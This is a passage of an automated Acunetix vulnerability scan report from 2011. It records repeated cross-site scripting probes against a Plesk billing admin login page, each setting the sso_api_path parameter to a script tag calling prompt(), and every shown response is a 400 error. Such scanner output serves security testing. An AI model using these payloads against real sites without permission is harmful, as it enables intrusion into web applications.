URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(913884)</ScRiPt>
Acunetix Website Audit21
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28913884%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 936
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Z%2fLcsRMvBKe4gDJc0qtVguUx%2bpcitV3RshXJgCWM9LVYd9nmxz5bvUH9kROLFDUySD8qEjXJGOQqpOPGfiXPLDkulZXRLWnlkyaiaqMdne7va2bsw39r77dF2UBg9xgc0tp1qEFoPvQitDck2O4UYqd1WpqhoxHM9D7WcTr9tGGMDmYmVKlxxX1Or%2fOm7VWjGEkG%2blIFltptKghnsKA0uF2s5gTBp%2fmsLsQN7fXvb7P97Dl5qeHIMEOQnPguCPoNWgq%2folcB36Pl6VUAIBx4misJm4i8WNUpZ-99d1d8f5815393576c6a33a706548c9f486cb796&request_id=vtk10sf6g7c9jhtzd1f55jfm0dllhfhvbpa&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:13 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:14 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(919646)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28919646%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 872
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...ovhAtAiwKC356KANm%2f7qUTHZFLA5jWxZZccb5OT68r4qmLer0VsPHRIj6hYFZiQmN31yr4wxSBI9%2brtG3E68SUooijXU7zsbOaHfqm2m%2bXtDusL2GYdTg4doh1HJddwfnpNbTWXZwatiWBRKFuG6DafsY2Tqs06Dm%2fe%2fF38IBahN6bG37nEf75sWNmWjNmYy60EDKamMZzfTLTRlKh5I6CGYtfm0lXvHXt7dN%2fr9zdUrDiyAPXn3i2UYTV9AoRbYSJb2b2OToQUoLDuZYhY3UX%2fPuHPY%3d-36f5da45dea4db35181527932feb21b4522af8ff&request_id=vqde3mrhcmcu72zf2edh2jk25dllhfhnnso&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:13 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:13 GMT
Server: sw-cp-server
Content-Length: 124
Acunetix Website Audit22
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(989209)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28989209%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 880
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Cizilrmx8cyqMzqkIhnAnRxKqblgSogAJf4QVcVTVvU6VX9hyLEWalhs6SjMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=sv0q3uhszc35j7nquwacpsc1mdllhfjxlzl&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:14 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:15 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(937674)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28937674%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 869
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...fQui48Jr7kWc7%2buki327nEsxhbugqa1obIABnOiBoam6vmrz24wfE4nkcysWxWdt42ZaSzMaCZzsXMm2IzQZKSeRx3bfSMb%2b3BxHjM63z9K%2fnKxpOhy7i4l%2buUl5uxrnnDRmPsmoLzPbotCIidZtMP1Aia3jOo9q2b%2b4eE53orVp0L3vL2V06G5hKkQpCkm6tBU5qo0lmRndWVnMd5I7UCyG%2f95K0MDr29sm%2f9%2bxBmXEjWMUUX3e0ZKHqzBa8uKklvjuYVeSF1J6EcRCVbFx%2bgvUdR22-793b72608099d2555312d5b39efab3a788f206a0&request_id=eo8l93kulathzgb1cv79uukndllhfhyh6c&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:14 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Acunetix Website Audit23
Date: Wed, 28 Sep 2011 17:34:14 GMT
Server: sw-cp-server
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(902029)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28902029%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 878
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...R7ReiRSqH0qkwPRQRN%2fMOKZPNErl45LZNYSkyIUb%2bRFvmdZNX6ZXdByKyeGnVDHJCG3bLKsYgMTmbubJpJ1EmppRDgh3uGHYX1NjfaEIaTy89xXOPT7Z%2b6qeLrS%2fuFkpvem3MNJ6ggTbbg0CiyON2mqblvNZunTqYj5clnGOvKhtbbFzzvEHb%2buaHbdFKZJp1oVUpqH1LNjMsZ7CUriR1kJqN%2fLOXRCle3952%2bf8O1YNRN0lBBfisg2UHV2VQy81H1PTuYL3lrrR2yquZq2rf6C%2fWORs5-4eb0fde9b4cce264a406fc960f41760b3e6e8367&request_id=dzdzpqpoxjuq68gfyrbs9if1edllhfhwgk4&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:14 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:14 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(985928)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28985928%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 880
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Cizilrmx8cyqMzqkIhnAnRxKqblgSogAJf4QVcVTVvU6VX9hyLEWalhs6SjMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=c220q1jnalmn2xo8hd0quy5psdllhfhhfw6&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:13 GMT
Acunetix Website Audit24
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:13 GMT
Server: sw-cp-server
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(904410)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28904410%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 825
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...fh%2fjFKdRNTh6xT8Y2H%2fRGS5cMidCPNjHbHEN%2bReSijcekxjxWMDDOCUHtg1VddXbX6b8R0Rk31uxKL4jCZsobUJg5TIU5xriu0ITWbKTWTY8CXZ2J%2bb40jBuvaXdK8no5uOxu6ig1tuUt6u2lortZ5PMuBlZlsVSBTTuo2m36XG1nGdR7XsX204xwfRmrjD3vWXAt11Nz8VoakKmXyhEbmqTWUKM9izMpTvSZ4gsWj%2bczuCBt7u983%2bv8vqlRY3TkEE9XGXNmW4Co2SlyRRUlZ3%2fwNAYhUF-6aa08bb638a3c7ef52dd1951e77f710d12a89d36&request_id=a8x4rz5n8jyth4atjh08g021kdllhffm705&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 15:11:56 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 15:11:56 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(921824)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28921824%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 833
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...wIoLyX0bvnpS5Sv2JyHBhJbfCz095kHtwTZrFHgc3Tsay3V0BDOASD7RFVtVZmb6ie0eEaJxrsSCfpfZHXGXESIrkMcg1BnaGIjGlGSRYE22ct63vvavudy0v1fX3cHcDboNf13VDvCo1n9UU78tkXoqZHTOQRCF2O1jqGCyt3Tp3uPQvxt%2fCIEodWlnb%2bnmHttWrG3edJbAp2pJapBkdIqMIb26oKS1IqiCxKP7reIIC3h6Pw%2f2%2f%2fXSoxCsnLzx%2bxJ7G8Fah5MT3COVESdfjD%2f2JDf0%3d-3e2d8237554de288723d4ae69cc01c78981623f6&request_id=iadl6yl2ga89192xs60901aajdllhffkzv0&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Acunetix Website Audit25
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 15:11:55 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 15:11:56 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(991810)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28991810%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 847
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...JLxc0n4gWLixyK%2fz0VAbM%2bXVpMzkVvjiMbdlkBQzgHB%2foq6Jpizq91fCOCNE%2fN2JWfELjt9TqiEGK5DHPNeZ2gioxpVUkWLcDNnZGu1PfTPP1gnaH7TUMoxZeXDsUtVzX3cE5qfV0lp04NWzbBRKFOG6jafu4snVYp0HN%2b1%2bLv4WDqE3osbXtS4b2zasbs9AamIy%2b0Ii0q01lDNMvN2UoHUrqIDFr%2fnMrQQVvj8dm%2f9%2b5OqXFKycvvPrAs40hrkKj5DlKlJTkPf4Ac1gURQ%3d%3d-01b99c8bb5066633b1b1a1ad9d5f1b706e88f586&request_id=yrowwhebzhmk83pzpv9vmfcyzdllhfdokf7&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 15:11:55 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 15:11:55 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(937198)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28937198%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 878
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...R7ReiRSqH0qkwPRQRN%2fMOKZPNErl45LZNYSkyIUb%2bRFvmdZNX6ZXdByKyeGnVDHJCG3bLKsYgMTmbubJpJ1EmppRDgh3uGHYX1NjfaEIaTy89xXOPT7Z%2b6qeLrS%2fuFkpvem3MNJ6ggTbbg0CiyON2mqblvNZunTqYj5clnGOvKhtbbFzzvEHb%2buaHbdFKZJp1oVUpqH1LNjMsZ7CUriR1kJqN%2fLOXRCle3952%2bf8O1YNRN0lBBfisg
Acunetix Website Audit26
2UHV2VQy81H1PTuYL3lrrR2yquZq2rf6C%2fWORs5-4eb0fde9b4cce264a406fc960f41760b3e6e8367&request_id=c9dps92q7ckk9m0d3ylk7219odllhffp7io&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2f
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:11 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:12 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(943452)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28943452%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 880
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Cizilrmx8cyqMzqkIhnAnRxKqblgSogAJf4QVcVTVvU6VX9hyLEWalhs6SjMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=a2e382443rlratzlfj4buc9z7dllhfd4smq&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:11 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:11 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(916993)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28916993%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 883
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated)
Acunetix Website Audit27
...9A2DfPdipqsr%2fpgXguJg1n0UYLlnUq8AqTX51kTuvMW01JWeEsR4XO%2bT7otzTtPP6HRHRL27FpPigbdhcpojRgMXR%2fwV9blmeKqXRJVh1ZGTUTTTjs71d3eLnsNza%2b%2b3RdqK0ZowP0bh2qoU0ZuhlaF0g2%2bw0QMR2W5nygCNe6mWo1XT65cIYG0FtPOhyLu8r9FA8fbcSpYxI1KWtSLPdWKKZwY3KQnpYKQPEZPjPLcRy9vZ6bfL%2ffQevjHhyCCKoD%2fwWaPoijJZ8tV5LSHJefwD4p0Go-f16f9880aa4f12de53cf27fea34cfa0a66ab72ab&request_id=rus53u3ath3l8uomn90u5p2yfdllhffmoni&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2fr
Response
HTTP/1.1 400 Bad Request
Connection: close
Expires: Fri, 28 Oct 2011 15:11:56 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 15:11:56 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(973053)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28973053%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 936
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Z%2fLcsRMvBKe4gDJc0qtVguUx%2bpcitV3RshXJgCWM9LVYd9nmxz5bvUH9kROLFDUySD8qEjXJGOQqpOPGfiXPLDkulZXRLWnlkyaiaqMdne7va2bsw39r77dF2UBg9xgc0tp1qEFoPvQitDck2O4UYqd1WpqhoxHM9D7WcTr9tGGMDmYmVKlxxX1Or%2fOm7VWjGEkG%2blIFltptKghnsKA0uF2s5gTBp%2fmsLsQN7fXvb7P97Dl5qeHIMEOQnPguCPoNWgq%2folcB36Pl6VUAIBx4misJm4i8WNUpZ-99d1d8f5815393576c6a33a706548c9f486cb796&request_id=bjhuaj5t7lv9jg0oq9u6qvaxxdllhfog5bs&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:17 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:18 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(916035)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28916035%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 869
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Acunetix Website Audit28
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...fQui48Jr7kWc7%2buki327nEsxhbugqa1obIABnOiBoam6vmrz24wfE4nkcysWxWdt42ZaSzMaCZzsXMm2IzQZKSeRx3bfSMb%2b3BxHjM63z9K%2fnKxpOhy7i4l%2buUl5uxrnnDRmPsmoLzPbotCIidZtMP1Aia3jOo9q2b%2b4eE53orVp0L3vL2V06G5hKkQpCkm6tBU5qo0lmRndWVnMd5I7UCyG%2f95K0MDr29sm%2f9%2bxBmXEjWMUUX3e0ZKHqzBa8uKklvjuYVeSF1J6EcRCVbFx%2bgvUdR22-793b72608099d2555312d5b39efab3a788f206a0&request_id=wn0u0cu6wa17iw518ownqndidllhfofoug&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2fr
Response
HTTP/1.1 400 Bad Request
Connection: close
Expires: Fri, 28 Oct 2011 17:34:17 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:17 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(938916)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28938916%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 878
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...R7ReiRSqH0qkwPRQRN%2fMOKZPNErl45LZNYSkyIUb%2bRFvmdZNX6ZXdByKyeGnVDHJCG3bLKsYgMTmbubJpJ1EmppRDgh3uGHYX1NjfaEIaTy89xXOPT7Z%2b6qeLrS%2fuFkpvem3MNJ6ggTbbg0CiyON2mqblvNZunTqYj5clnGOvKhtbbFzzvEHb%2buaHbdFKZJp1oVUpqH1LNjMsZ7CUriR1kJqN%2fLOXRCle3952%2bf8O1YNRN0lBBfisg2UHV2VQy81H1PTuYL3lrrR2yquZq2rf6C%2fWORs5-4eb0fde9b4cce264a406fc960f41760b3e6e8367&request_id=xg4vbfmkb6zlp1yoqnjof5q6cdllhfof70a&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:17 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:17 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(971685)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28971685%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 872
Content-Type: application/x-www-form-urlencoded
Acunetix Website Audit29
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...ovhAtAiwKC356KANm%2f7qUTHZFLA5jWxZZccb5OT68r4qmLer0VsPHRIj6hYFZiQmN31yr4wxSBI9%2brtG3E68SUooijXU7zsbOaHfqm2m%2bXtDusL2GYdTg4doh1HJddwfnpNbTWXZwatiWBRKFuG6DafsY2Tqs06Dm%2fe%2fF38IBahN6bG37nEf75sWNmWjNmYy60EDKamMZzfTLTRlKh5I6CGYtfm0lXvHXt7dN%2fr9zdUrDiyAPXn3i2UYTV9AoRbYSJb2b2OToQUoLDuZYhY3UX%2fPuHPY%3d-36f5da45dea4db35181527932feb21b4522af8ff&request_id=q6doj6qcwss13qtaxjubgcaradllhfongy9&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2fr
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:18 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:18 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(940375)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28940375%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 880
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
